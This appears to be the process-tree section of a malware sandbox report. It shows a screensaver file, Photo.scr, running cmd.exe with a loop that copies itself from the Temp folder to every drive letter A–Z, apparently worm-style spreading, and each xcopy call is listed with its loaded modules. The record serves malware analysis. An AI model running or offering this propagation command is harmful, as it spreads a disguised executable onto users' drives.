Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3252
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" H:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3760
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" J:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2112
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" K:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll

PID
2704
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" L:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3272
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" M:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3792
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" N:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2288
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" O:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2764
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" P:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3428
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" R:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3968
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" S:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2448
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" T:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2992
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" Q:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3668
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" U:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll

PID
2100
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" Y:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2748
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" I:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3484
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" X:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
4084
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" V:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2620
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" X:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3280
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" W:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2512
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" Z:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2144
CMD
"C:\Windows\System32\cmd.exe" /c for %i in (A B C D E F G H J K L M N O P R S T Q U Y I X V X W Z) do xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" %i:\
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
Photo.scr
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1428
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" A:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
4008
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" B:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2624
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" C:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
1428
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" D:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\imm32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernelbase.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\xcopy.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ulib.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\msctf.dll

PID
4068
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" E:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3244
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" F:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2236
CMD
